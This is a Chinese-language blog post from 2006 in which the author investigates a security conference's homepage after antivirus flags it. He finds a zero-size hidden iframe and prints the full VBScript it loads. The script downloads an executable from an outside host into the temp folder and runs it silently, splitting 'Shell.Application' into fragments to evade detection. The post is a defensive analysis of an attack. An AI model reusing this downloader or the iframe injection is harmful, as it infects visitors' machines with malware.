(广州)国际黑客防范技术高峰论坛主页还是被挂马了

最新推荐文章于 2024-07-23 09:28:54 发布

liswa

最新推荐文章于 2024-07-23 09:28:54 发布

阅读量8.5k

点赞数

分类专栏：安全文章标签： iframe vbscript etag 杀毒软件 function windows

本文链接：https://blog.csdn.net/liswa/article/details/1269637

版权

安全专栏收录该内容

44 篇文章 0 订阅

订阅专栏

看了http://news.csdn.net/n/20060923/95188.html ，说是(广州)国际黑客防范技术高峰论坛主页被黑了，抱着看看去的阴暗心理，我到google上查找了(广州)国际黑客防范技术高峰论坛主页的主页（http://www.hacker-halted.cn/），谁知一打开Noron立刻报告说发现病毒，呵呵，我晕，究意这主页还有没有人维护的？之前说被黑了被留了字，怎么今天我打开了不是留字而是被留木马了。我今天可是杀病毒杀得累了，幸好不是免杀木马，Norton发现被清除了（不会清不干净吧，迟点再清查下）。

我又在想会不会是Norton误报了（之前遇到过类似的事情，一个网页上用了vbscript.encoder结果就被瑞星报告说是有害脚本了，其实是完全清白的）。于是直接查看网页源码。一般来说挂马的人都喜欢用iframe，直接查找iframe找到一个地方。代码<iframe src=http://jn.a.com.cn/cert/1.htm width=0 height=0></iframe>，一看width=0,height=0就觉得长得不像好人。用flashget下载1.htm，结果我的Norton非常尽职的把它杀掉了，试着把Norton停止再下，但是今晚Norton异常的尽职，死活不肯停止，罢了，再用排除目录把downloads目录排除在查杀目录，居然照杀不误，Norton今晚真是太神了！只好用winsock expert直接用嗅探方式得到1.htm的源码。

如下：

GET /cert/1.htm HTTP/1.1
Host: jn.a.com.cn
Accept: */*
Referer: http://jn.a.com.cn/cert
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

HTTP/1.1 200 OK
Content-Length: 944
Content-Type: text/html
Last-Modified: Fri, 22 Sep 2006 15:38:04 GMT
Accept-Ranges: bytes
ETag: "4e882b185ddec61:1238"
Server: Microsoft-IIS/6.0
Date: Sat, 23 Sep 2006 13:13:32 GMT
Connection: close

<html>
<script language="VBScript">
ouud="Sh"
zrzl="el"
iysx="l."
ovls="Ap"
lkcx="pl"
mrpq="ic"
wdrm="at"
gfxn="io"
giey="n"
on error resume next
dl = "http://www.bzshenhui.com/inc/q.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
str5="Adodb.Stream"
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="zj1244.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(ouud+zrzl+iysx+ovls+lkcx+mrpq+wdrm+gfxn+giey,"")
Q.ShellExecute fname1,"","","open",0
</script>
<script type="text/jscript">
function zj1244()
{document.write("");}
window.onload = zj1244;
</script>
</html>

这下狐狸的尾巴露出来了，不用多说了肯定是挂马了。为了逃避杀毒软件，还把shell.application分段了，分成了

ouud="Sh"
zrzl="el"
iysx="l."
ovls="Ap"
lkcx="pl"
mrpq="ic"
wdrm="at"
gfxn="io"
giey="n"

而要下载并运行的程序就是http://www.bzshenhui.com/inc/q.exe了。可惜的是我尝试下载这个程序想进行分析，却怎么也下载不了，所以分析只好到此作罢。

看来国内的单位、厂家都喜欢这样，会议名头搞得大大的，邀请了一大堆人，但就是不肯花点功夫先弄好自己的站点，把一个站点仅看成是街边的公告栏，喜欢贴“牛皮癣”尽管往上贴，反正自己也从来不看的。可是，问题是你开的这个回忆本身就是讲安全的，自己的站点都不安全还研究什么？？！！

补记：

写完以上文字后，再到各栏目看了下，才发觉csdn上说的被黑的留字（“黑客在此，你在哪里？”）居然还留在那里，看来这个站点根本就是属于无人监管的，csdn上说昨天上午11时已经被黑了，但直到现在还是没有被恢复回去，不用说属于无人监管的网站了。讨论防范技术，莫非就是拿自己网站被黑这个来让与会的进行讨论！